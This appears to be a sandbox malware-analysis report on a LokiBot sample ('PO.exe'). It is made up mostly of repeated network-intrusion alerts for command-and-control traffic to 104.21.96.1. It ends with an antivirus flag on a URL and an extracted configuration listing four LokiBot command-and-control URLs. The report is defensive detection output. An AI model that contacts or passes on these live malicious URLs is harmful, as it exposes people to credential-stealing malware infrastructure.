2025-02-25T05:24:16.573678+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49707	TCP
2025-02-25T05:24:20.366406+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49709	TCP
2025-02-25T05:24:22.260092+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49710	TCP
2025-02-25T05:24:27.985771+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49750	TCP
2025-02-25T05:24:30.007653+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49764	TCP
2025-02-25T05:24:31.924500+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49775	TCP
2025-02-25T05:24:35.722729+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49803	TCP
2025-02-25T05:24:46.998807+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49885	TCP
2025-02-25T05:24:54.587042+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49937	TCP
2025-02-25T05:24:56.380157+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49953	TCP
2025-02-25T05:24:58.316135+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49964	TCP
2025-02-25T05:25:00.257285+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	49976	TCP
2025-02-25T05:25:04.114840+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50004	TCP
2025-02-25T05:25:06.071085+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50007	TCP
2025-02-25T05:25:07.970889+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50008	TCP
2025-02-25T05:25:11.828359+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50010	TCP
2025-02-25T05:25:13.777704+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50011	TCP
2025-02-25T05:25:15.693672+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50012	TCP
2025-02-25T05:25:17.611002+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50013	TCP
2025-02-25T05:25:19.410941+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50014	TCP
2025-02-25T05:25:23.272185+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50016	TCP
2025-02-25T05:25:28.977409+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50019	TCP
2025-02-25T05:25:30.946727+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50020	TCP
2025-02-25T05:25:32.914062+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50021	TCP
2025-02-25T05:25:36.745246+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50023	TCP
2025-02-25T05:25:38.675147+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50024	TCP
2025-02-25T05:25:42.548921+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50026	TCP
2025-02-25T05:25:46.529931+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50028	TCP
2025-02-25T05:25:48.455909+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50029	TCP
2025-02-25T05:25:52.480048+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50031	TCP
2025-02-25T05:25:54.444104+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50032	TCP
2025-02-25T05:25:58.273278+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50034	TCP
2025-02-25T05:26:00.229947+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50035	TCP
2025-02-25T05:26:02.186610+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50036	TCP
2025-02-25T05:26:06.013075+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50038	TCP
2025-02-25T05:26:07.944101+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50039	TCP
2025-02-25T05:26:11.940779+0100	2025483	1	A Network Trojan was detected	104.21.96.1	80	192.168.2.5	50041	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T05:24:14.677464+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49706	104.21.96.1	80	TCP
2025-02-25T05:24:16.568391+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49707	104.21.96.1	80	TCP
2025-02-25T05:24:18.458451+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49708	104.21.96.1	80	TCP
2025-02-25T05:24:20.361372+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.96.1	80	TCP
2025-02-25T05:24:22.255015+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49710	104.21.96.1	80	TCP
2025-02-25T05:24:24.135502+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49718	104.21.96.1	80	TCP
2025-02-25T05:24:26.058592+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49733	104.21.96.1	80	TCP
2025-02-25T05:24:27.972135+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49750	104.21.96.1	80	TCP
2025-02-25T05:24:30.002577+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49764	104.21.96.1	80	TCP
2025-02-25T05:24:31.919364+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49775	104.21.96.1	80	TCP
2025-02-25T05:24:33.812913+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49791	104.21.96.1	80	TCP
2025-02-25T05:24:35.717643+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49803	104.21.96.1	80	TCP
2025-02-25T05:24:37.619452+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49818	104.21.96.1	80	TCP
2025-02-25T05:24:39.493477+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49830	104.21.96.1	80	TCP
2025-02-25T05:24:41.417009+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49845	104.21.96.1	80	TCP
2025-02-25T05:24:43.344638+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49858	104.21.96.1	80	TCP
2025-02-25T05:24:45.224511+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49872	104.21.96.1	80	TCP
2025-02-25T05:24:46.993722+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49885	104.21.96.1	80	TCP
2025-02-25T05:24:48.884257+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49899	104.21.96.1	80	TCP
2025-02-25T05:24:50.775720+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49910	104.21.96.1	80	TCP
2025-02-25T05:24:52.670724+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49926	104.21.96.1	80	TCP
2025-02-25T05:24:54.581660+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49937	104.21.96.1	80	TCP
2025-02-25T05:24:56.369453+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49953	104.21.96.1	80	TCP
2025-02-25T05:24:58.311102+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49964	104.21.96.1	80	TCP
2025-02-25T05:25:00.252248+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49976	104.21.96.1	80	TCP
2025-02-25T05:25:02.133231+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49992	104.21.96.1	80	TCP
2025-02-25T05:25:04.109784+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50004	104.21.96.1	80	TCP
2025-02-25T05:25:06.066009+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50007	104.21.96.1	80	TCP
2025-02-25T05:25:07.965764+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50008	104.21.96.1	80	TCP
2025-02-25T05:25:09.877106+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50009	104.21.96.1	80	TCP
2025-02-25T05:25:11.823241+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50010	104.21.96.1	80	TCP
2025-02-25T05:25:13.772613+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50011	104.21.96.1	80	TCP
2025-02-25T05:25:15.688616+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50012	104.21.96.1	80	TCP
2025-02-25T05:25:17.605902+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50013	104.21.96.1	80	TCP
2025-02-25T05:25:19.405903+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50014	104.21.96.1	80	TCP
2025-02-25T05:25:21.306113+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50015	104.21.96.1	80	TCP
2025-02-25T05:25:23.267064+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50016	104.21.96.1	80	TCP
2025-02-25T05:25:25.153137+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50017	104.21.96.1	80	TCP
2025-02-25T05:25:27.054481+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50018	104.21.96.1	80	TCP
2025-02-25T05:25:28.971804+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50019	104.21.96.1	80	TCP
2025-02-25T05:25:30.941623+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50020	104.21.96.1	80	TCP
2025-02-25T05:25:32.905995+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50021	104.21.96.1	80	TCP
2025-02-25T05:25:34.791351+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50022	104.21.96.1	80	TCP
2025-02-25T05:25:36.740193+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50023	104.21.96.1	80	TCP
2025-02-25T05:25:38.670110+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50024	104.21.96.1	80	TCP
2025-02-25T05:25:40.573705+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50025	104.21.96.1	80	TCP
2025-02-25T05:25:42.543813+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50026	104.21.96.1	80	TCP
2025-02-25T05:25:44.429533+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50027	104.21.96.1	80	TCP
2025-02-25T05:25:46.524821+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50028	104.21.96.1	80	TCP
2025-02-25T05:25:48.450830+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50029	104.21.96.1	80	TCP
2025-02-25T05:25:50.491077+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50030	104.21.96.1	80	TCP
2025-02-25T05:25:52.472350+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50031	104.21.96.1	80	TCP
2025-02-25T05:25:54.439089+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50032	104.21.96.1	80	TCP
2025-02-25T05:25:56.310385+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50033	104.21.96.1	80	TCP
2025-02-25T05:25:58.268082+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50034	104.21.96.1	80	TCP
2025-02-25T05:26:00.224886+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50035	104.21.96.1	80	TCP
2025-02-25T05:26:02.181519+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50036	104.21.96.1	80	TCP
2025-02-25T05:26:04.182458+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50037	104.21.96.1	80	TCP
2025-02-25T05:26:06.007993+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50038	104.21.96.1	80	TCP
2025-02-25T05:26:07.939009+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50039	104.21.96.1	80	TCP
2025-02-25T05:26:09.848187+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50040	104.21.96.1	80	TCP
2025-02-25T05:26:11.935736+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50041	104.21.96.1	80	TCP
2025-02-25T05:26:13.796031+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50042	104.21.96.1	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T05:24:11.100054+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49704	104.21.96.1	80	TCP
2025-02-25T05:24:13.065853+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49705	104.21.96.1	80	TCP
2025-02-25T05:24:13.907230+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49706	104.21.96.1	80	TCP
2025-02-25T05:24:15.830902+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49707	104.21.96.1	80	TCP
2025-02-25T05:24:17.732481+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49708	104.21.96.1	80	TCP
2025-02-25T05:24:19.607817+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49709	104.21.96.1	80	TCP
2025-02-25T05:24:21.513553+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49710	104.21.96.1	80	TCP
2025-02-25T05:24:23.406015+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49718	104.21.96.1	80	TCP
2025-02-25T05:24:25.298458+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49733	104.21.96.1	80	TCP
2025-02-25T05:24:27.219618+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49750	104.21.96.1	80	TCP
2025-02-25T05:24:29.234934+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49764	104.21.96.1	80	TCP
2025-02-25T05:24:31.156773+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49775	104.21.96.1	80	TCP
2025-02-25T05:24:33.109138+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49791	104.21.96.1	80	TCP
2025-02-25T05:24:34.969508+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49803	104.21.96.1	80	TCP
2025-02-25T05:24:36.891694+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49818	104.21.96.1	80	TCP
2025-02-25T05:24:38.780753+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49830	104.21.96.1	80	TCP
2025-02-25T05:24:40.654333+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49845	104.21.96.1	80	TCP
2025-02-25T05:24:42.607102+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49858	104.21.96.1	80	TCP
2025-02-25T05:24:44.500110+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49872	104.21.96.1	80	TCP
2025-02-25T05:24:46.379957+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49885	104.21.96.1	80	TCP
2025-02-25T05:24:48.157567+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49899	104.21.96.1	80	TCP
2025-02-25T05:24:50.062939+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49910	104.21.96.1	80	TCP
2025-02-25T05:24:51.944793+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49926	104.21.96.1	80	TCP
2025-02-25T05:24:53.828807+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49937	104.21.96.1	80	TCP
2025-02-25T05:24:55.751903+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49953	104.21.96.1	80	TCP
2025-02-25T05:24:57.564039+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49964	104.21.96.1	80	TCP
2025-02-25T05:24:59.497837+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49976	104.21.96.1	80	TCP
2025-02-25T05:25:01.410148+0100	2021641	1	A Network Trojan was detected	192.168.2.5	49992	104.21.96.1	80	TCP
2025-02-25T05:25:03.315327+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50004	104.21.96.1	80	TCP
2025-02-25T05:25:05.320340+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50007	104.21.96.1	80	TCP
2025-02-25T05:25:07.217222+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50008	104.21.96.1	80	TCP
2025-02-25T05:25:09.128533+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50009	104.21.96.1	80	TCP
2025-02-25T05:25:11.030905+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50010	104.21.96.1	80	TCP
2025-02-25T05:25:12.999939+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50011	104.21.96.1	80	TCP
2025-02-25T05:25:14.943218+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50012	104.21.96.1	80	TCP
2025-02-25T05:25:16.841565+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50013	104.21.96.1	80	TCP
2025-02-25T05:25:18.785842+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50014	104.21.96.1	80	TCP
2025-02-25T05:25:20.582160+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50015	104.21.96.1	80	TCP
2025-02-25T05:25:22.499828+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50016	104.21.96.1	80	TCP
2025-02-25T05:25:24.422327+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50017	104.21.96.1	80	TCP
2025-02-25T05:25:26.320259+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50018	104.21.96.1	80	TCP
2025-02-25T05:25:28.219808+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50019	104.21.96.1	80	TCP
2025-02-25T05:25:30.140838+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50020	104.21.96.1	80	TCP
2025-02-25T05:25:32.134031+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50021	104.21.96.1	80	TCP
2025-02-25T05:25:34.079242+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50022	104.21.96.1	80	TCP
2025-02-25T05:25:35.970246+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50023	104.21.96.1	80	TCP
2025-02-25T05:25:37.908677+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50024	104.21.96.1	80	TCP
2025-02-25T05:25:39.832786+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50025	104.21.96.1	80	TCP
2025-02-25T05:25:41.755922+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50026	104.21.96.1	80	TCP
2025-02-25T05:25:43.709004+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50027	104.21.96.1	80	TCP
2025-02-25T05:25:45.764297+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50028	104.21.96.1	80	TCP
2025-02-25T05:25:47.694139+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50029	104.21.96.1	80	TCP
2025-02-25T05:25:49.782796+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50030	104.21.96.1	80	TCP
2025-02-25T05:25:51.686456+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50031	104.21.96.1	80	TCP
2025-02-25T05:25:53.663006+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50032	104.21.96.1	80	TCP
2025-02-25T05:25:55.595533+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50033	104.21.96.1	80	TCP
2025-02-25T05:25:57.477338+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50034	104.21.96.1	80	TCP
2025-02-25T05:25:59.460377+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50035	104.21.96.1	80	TCP
2025-02-25T05:26:01.398189+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50036	104.21.96.1	80	TCP
2025-02-25T05:26:03.448370+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50037	104.21.96.1	80	TCP
2025-02-25T05:26:05.372369+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50038	104.21.96.1	80	TCP
2025-02-25T05:26:07.176187+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50039	104.21.96.1	80	TCP
2025-02-25T05:26:09.117397+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50040	104.21.96.1	80	TCP
2025-02-25T05:26:11.284388+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50041	104.21.96.1	80	TCP
2025-02-25T05:26:13.086717+0100	2021641	1	A Network Trojan was detected	192.168.2.5	50042	104.21.96.1	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T05:24:11.100054+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49704	104.21.96.1	80	TCP
2025-02-25T05:24:13.065853+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49705	104.21.96.1	80	TCP
2025-02-25T05:24:13.907230+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49706	104.21.96.1	80	TCP
2025-02-25T05:24:15.830902+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49707	104.21.96.1	80	TCP
2025-02-25T05:24:17.732481+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49708	104.21.96.1	80	TCP
2025-02-25T05:24:19.607817+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.96.1	80	TCP
2025-02-25T05:24:21.513553+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49710	104.21.96.1	80	TCP
2025-02-25T05:24:23.406015+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49718	104.21.96.1	80	TCP
2025-02-25T05:24:25.298458+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49733	104.21.96.1	80	TCP
2025-02-25T05:24:27.219618+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49750	104.21.96.1	80	TCP
2025-02-25T05:24:29.234934+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49764	104.21.96.1	80	TCP
2025-02-25T05:24:31.156773+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49775	104.21.96.1	80	TCP
2025-02-25T05:24:33.109138+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49791	104.21.96.1	80	TCP
2025-02-25T05:24:34.969508+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49803	104.21.96.1	80	TCP
2025-02-25T05:24:36.891694+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49818	104.21.96.1	80	TCP
2025-02-25T05:24:38.780753+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49830	104.21.96.1	80	TCP
2025-02-25T05:24:40.654333+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49845	104.21.96.1	80	TCP
2025-02-25T05:24:42.607102+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49858	104.21.96.1	80	TCP
2025-02-25T05:24:44.500110+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49872	104.21.96.1	80	TCP
2025-02-25T05:24:46.379957+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49885	104.21.96.1	80	TCP
2025-02-25T05:24:48.157567+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49899	104.21.96.1	80	TCP
2025-02-25T05:24:50.062939+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49910	104.21.96.1	80	TCP
2025-02-25T05:24:51.944793+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49926	104.21.96.1	80	TCP
2025-02-25T05:24:53.828807+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49937	104.21.96.1	80	TCP
2025-02-25T05:24:55.751903+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49953	104.21.96.1	80	TCP
2025-02-25T05:24:57.564039+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49964	104.21.96.1	80	TCP
2025-02-25T05:24:59.497837+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49976	104.21.96.1	80	TCP
2025-02-25T05:25:01.410148+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49992	104.21.96.1	80	TCP
2025-02-25T05:25:03.315327+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50004	104.21.96.1	80	TCP
2025-02-25T05:25:05.320340+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50007	104.21.96.1	80	TCP
2025-02-25T05:25:07.217222+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50008	104.21.96.1	80	TCP
2025-02-25T05:25:09.128533+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50009	104.21.96.1	80	TCP
2025-02-25T05:25:11.030905+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50010	104.21.96.1	80	TCP
2025-02-25T05:25:12.999939+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50011	104.21.96.1	80	TCP
2025-02-25T05:25:14.943218+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50012	104.21.96.1	80	TCP
2025-02-25T05:25:16.841565+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50013	104.21.96.1	80	TCP
2025-02-25T05:25:18.785842+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50014	104.21.96.1	80	TCP
2025-02-25T05:25:20.582160+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50015	104.21.96.1	80	TCP
2025-02-25T05:25:22.499828+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50016	104.21.96.1	80	TCP
2025-02-25T05:25:24.422327+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50017	104.21.96.1	80	TCP
2025-02-25T05:25:26.320259+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50018	104.21.96.1	80	TCP
2025-02-25T05:25:28.219808+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50019	104.21.96.1	80	TCP
2025-02-25T05:25:30.140838+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50020	104.21.96.1	80	TCP
2025-02-25T05:25:32.134031+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50021	104.21.96.1	80	TCP
2025-02-25T05:25:34.079242+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50022	104.21.96.1	80	TCP
2025-02-25T05:25:35.970246+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50023	104.21.96.1	80	TCP
2025-02-25T05:25:37.908677+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50024	104.21.96.1	80	TCP
2025-02-25T05:25:39.832786+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50025	104.21.96.1	80	TCP
2025-02-25T05:25:41.755922+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50026	104.21.96.1	80	TCP
2025-02-25T05:25:43.709004+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50027	104.21.96.1	80	TCP
2025-02-25T05:25:45.764297+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50028	104.21.96.1	80	TCP
2025-02-25T05:25:47.694139+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50029	104.21.96.1	80	TCP
2025-02-25T05:25:49.782796+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50030	104.21.96.1	80	TCP
2025-02-25T05:25:51.686456+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50031	104.21.96.1	80	TCP
2025-02-25T05:25:53.663006+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50032	104.21.96.1	80	TCP
2025-02-25T05:25:55.595533+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50033	104.21.96.1	80	TCP
2025-02-25T05:25:57.477338+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50034	104.21.96.1	80	TCP
2025-02-25T05:25:59.460377+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50035	104.21.96.1	80	TCP
2025-02-25T05:26:01.398189+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50036	104.21.96.1	80	TCP
2025-02-25T05:26:03.448370+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50037	104.21.96.1	80	TCP
2025-02-25T05:26:05.372369+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50038	104.21.96.1	80	TCP
2025-02-25T05:26:07.176187+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50039	104.21.96.1	80	TCP
2025-02-25T05:26:09.117397+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50040	104.21.96.1	80	TCP
2025-02-25T05:26:11.284388+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50041	104.21.96.1	80	TCP
2025-02-25T05:26:13.086717+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50042	104.21.96.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://touxzw.ir/sccc/five/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.PO.exe.b90000.1.raw.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

